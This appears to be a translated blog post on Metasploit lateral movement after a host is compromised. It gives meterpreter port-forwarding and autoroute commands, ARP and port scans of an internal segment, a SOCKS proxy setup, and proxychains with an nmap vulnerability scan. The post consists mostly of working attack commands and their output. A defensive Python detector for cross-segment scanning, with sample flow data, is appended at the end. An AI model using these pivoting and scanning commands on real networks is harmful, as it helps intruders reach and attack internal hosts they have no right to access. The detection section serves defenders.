MSF lateral movement: MSF port forwarding + routing table + socks5 + proxychains
2022-07-06 17:58:00 【West Lake first sword】
Some MSF post-exploitation operations
Port forwarding
meterpreter > portfwd add -l 2222 -r 172.16.1.156 -p 3389 # Forward port 3389 on target machine 172.16.1.156 to local port 2222
meterpreter > portfwd list # View the forwarding list
meterpreter > portfwd flush # Clear the forwarding list
rdesktop 127.0.0.1:2222 # On Kali, connect the remote desktop client to local port 2222
Add a route for lateral movement (cross-segment attack)
run autoroute -s 172.16.2.0/24 # Add a route to the target environment's network segment
run autoroute -p # View added routes
route print # Print the routing table
run post/windows/gather/arp_scanner RHOSTS=172.16.2.0/24 # Scan the whole segment
run auxiliary/scanner/portscan/tcp RHOSTS=172.16.2.11 PORTS=3389 # Check whether the IP has port 3389 open
Use ARP to scan intranet hosts
use post/windows/gather/arp_scanner
set rhosts 172.16.2.0/24
set session 1
exploit
SOCKS proxy
Newer versions of MSF differ from older ones, and the proxy module is different as well.
auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set srvport 7777
srvport => 7777
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.
[*] Starting the SOCKS proxy server
Configure proxychains
Use proxy software to connect through the established SOCKS tunnel; you can then access the intranet.
vi /etc/proxychains.conf # add the line: socks5 127.0.0.1 7777
proxychains + nmap: scan the host for vulnerabilities
proxychains nmap -sT -Pn -p445 --script=vuln 192.168.52.141
Run the MSF framework through proxychains
proxychains msfconsole
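Connections sent over the autoroute route or the SOCKS tunnel (including the proxychains nmap -sT connect scan) leave from the compromised host, so network telemetry shows one internal address opening connections to many hosts in another segment on ports 3389/445. A detection sketch for that pattern, added here as an example and not part of the original post. The flow record format, the hosts 172.16.1.50 and 172.16.1.20, the 60-second window and the 5-host threshold are all assumptions:

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed flow records (time, src, dst, dst port); .50 and .20 are made-up hosts.
SAMPLE_FLOWS = """\
2022-07-06T10:00:01 172.16.1.50 172.16.2.10 3389
2022-07-06T10:00:01 172.16.1.50 172.16.2.11 3389
2022-07-06T10:00:02 172.16.1.50 172.16.2.12 3389
2022-07-06T10:00:02 172.16.1.50 172.16.2.13 445
2022-07-06T10:00:03 172.16.1.50 172.16.2.14 445
2022-07-06T10:00:03 172.16.1.50 172.16.2.15 3389
2022-07-06T10:05:00 172.16.1.20 172.16.2.11 3389
2022-07-06T10:06:00 172.16.1.20 172.16.1.156 3389
2022-07-06T11:30:00 172.16.1.20 172.16.2.12 445
truncated-line 172.16.1.20
"""
ADMIN_PORTS = {445, 3389}       # the ports probed in the article's commands
WINDOW = timedelta(seconds=60)  # assumed look-back window
MIN_HOSTS = 5                   # assumed threshold; tune per environment

def segment(ip):  # /24 containing ip (the article's segments are /24s)
    return ipaddress.ip_network(f"{ip}/24", strict=False)

def parse_flows(text):
    """Yield (time, src, dst, dport) tuples, skipping malformed lines."""
    for line in text.splitlines():
        try:
            ts, src, dst, dport = line.split()
            yield (datetime.fromisoformat(ts), ipaddress.ip_address(src),
                   ipaddress.ip_address(dst), int(dport))
        except ValueError:
            continue  # wrong field count or unparsable value

def find_fanout(flows, window=WINDOW, min_hosts=MIN_HOSTS):
    """Map each source to its peak count of distinct cross-segment admin-port targets per window."""
    hits = defaultdict(list)
    for ts, src, dst, dport in flows:
        if dport in ADMIN_PORTS and segment(src) != segment(dst):
            hits[str(src)].append((ts, str(dst)))
    alerts = {}
    for src, seen in hits.items():
        seen.sort()
        best = max(len({d for t, d in seen[i:] if t - start <= window})
                   for i, (start, _) in enumerate(seen))
        if best >= min_hosts:
            alerts[src] = best
    return alerts

print(find_fanout(parse_flows(SAMPLE_FLOWS)))
```

Only 172.16.1.50 is flagged on the sample data. The admin workstation's two cross-segment sessions are far apart in time, and its same-segment RDP connection is ignored.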